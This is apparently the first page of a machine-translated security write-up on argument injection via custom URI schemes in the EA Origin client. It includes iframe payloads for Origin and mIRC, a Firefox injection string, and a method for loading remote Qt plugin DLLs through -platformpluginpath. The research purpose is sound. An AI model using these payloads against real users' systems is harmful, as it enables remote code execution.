Talking about the URI Schemes of use-vulnerability warning-the black bar safety net

In the past month or so, I spent a lot of time to read and test custom URI Schemes to. As my previous post mentioned, not properly implemented a custom URI there may be many security issues. I mentioned“many”of the word, here I want to EA Origin client, for example, to share with you this aspect of content.
In short, this article is about the Origin of another RCE vulnerability, not CVE-2019-11354。

0x01 custom URI Schemes
In this article, we will take the Origin client for the study. However, this vulnerability also exists in many other applications, this technology that is not Origin specific. In order for us to better understand the exploit works, we need to understand Windows to custom URI Schemes.
If we in the registry to find the Origin of the URI Scheme, you can see the following information:
! [](/Article/UploadPic/2019-5/201952871142641. png)
From the above figure we can see the following data:
“C:\Program Files (x86)\Origin\Origin.exe” “%1”
When we call the origin://, or origin2://when Windows will use ShellExecute()to generate a process, use our input data to replace the%1.
For example: origin://game/launch it will generate an Origin process, which command line parameters:
C:\Program Files (x86)\Origin\Origin.exe “origin://game/launch”
If we slightly read the official manual, on MSDN, search register custom URI Schemes, the relevant information, you can see Microsoft has tips some security. Officer online there are so a words:
As described above, is passed to be inserted into the protocols, pluggable protocol）handler of the string may be truncated into multiple parameters. A malicious attacker could use the other quotation marks or backslash characters to bypass the other command line parameters. Therefore, the handler should assume that all command line parameters are possible from the attacker, care must be taken to handle these parameters. If the application may be executed based on the external data of the hazardous operation, then first of all it should be with the user to confirm these operations. In addition, responsible for the processing of these data the application should be directed to too long URI, or some non-expected or does not need the string sequence to be tested.
This means that the application needs to ensure that an attacker cannot through a carefully constructed URI to inject any illegal characters or parameters.
Based on the URI of the use of technology historic
If you read this article, you know by the URI parameter injection is not a new technology.
Before some vulnerability in the URI, add an escape"symbol, and thus from the%1 parameter in the escape. For example, in order to use the CVE-2007-3670 to inject the parameters, we just need to let remote users access to our carefully constructed the iframe and URI, it can be injected into the parameters to generate the target process.
firefoxurl://placeholder" --argument-injection
Using only command injection is it enough?
This process involves the ShellExecute is called and the parameters passed way, we cannot be ultimately injected into their desired command, only the injection parameters.

0x02 parameter injection
Limited to most applications, browser, mail client, etc to the URI, parameter injection attacks in 2019 has become increasingly difficult to use. Modern browsers Chrome, Firefox, Edge on the deal link to some of the characters to force the encoding, which obviously will make the attacker more difficult to escape.
However, if custom URI is not on the registry parameters for proper escape, we can directly use the space character to the injection parameters.
Recent mIRC existence of such a vulnerability, in order to achieve RCE, an attacker would only need to use the following payload:
iframe src=‘irc://? -i\\127.0.0.1\C$\mirc-poc\mirc. ini’>
We can refer here to learn more of the vulnerability discovery and use of the process.
Anyway, for this article the study of the Origin case, we are ready to build a brand new installation of Windows 8 system, with IE11 browser, the latter will be discussed further bypassed modern security mechanisms in terms of relevant content.
Payload
Start the virtual machine, the installation of Origin. Open notepad, enter the following data:
iframe src=‘origin://?" -reverse "’>
In IE open, allowing the Origin to start, if IE will pop up a prompt box. We should see the following interface:
! [](/Article/UploadPic/2019-5/201952871143478. png)
As shown above, the window icon now has to run to the other side. Here I forgot to mentioned that, the-reverse is a Qt specific one parameter. Origin mainly uses Qt framework for development, so I’d be tempted to try these parameters.
If we use Process Explorer to observe the process, you can see the following information:
! [](/Article/UploadPic/2019-5/201952871143737. png)
Understand the above information is enough to understand the parameters of the injection attack scenario.

0x03 arbitrary code execution
So how do we use this to achieve code execution? In order to see which options are available, we need to understand how to use the parameter list. In the analysis of the Origin of their own parameters before we start to concern about Qt-specific parameters.
View the Qt official documentation, shows that for all Qt app, we can use the following parameters:
-platform
-platformpluginpath
-platformtheme
-plugin
-qmljsdebugger
-qwindowgeometry
-qwindowicon
-qwindowtitle
-reverse
-session
-display
-geometry
Among the more noteworthy one parameter is platformpluginpath it. Through this parameter, we can specify Qt plugin loading path. These Qt plugin DLL files will then be loaded into the Origin and implementation.
We can use this behavior through a Windows share with platformpluginpath parameter for remote load plug-ins.
Qt official shows Qt plug-in and the corresponding list of directories. When using platformpluginpath parameters, a QGuiApplication will automatically load the following directory of the active DLL.
The base class
Directory
Qt module
QAccessibleBridgePlugin
accessiblebridge
Qt GUI
QImageIOPlugin
imageformats
Qt GUI
QPictureFormatPlugin
pictureformats
Qt GUI
QAudioSystemPlugin
audio
Qt Multimedia
QDeclarativeVideoBackendFactoryInterface
video/declarativevideobackend
Qt Multimedia
QGstBufferPoolPlugin
video/bufferpool
Qt Multimedia
QMediaPlaylistIOPlugin
playlistformats
Qt Multimedia

[1] [2] [3] next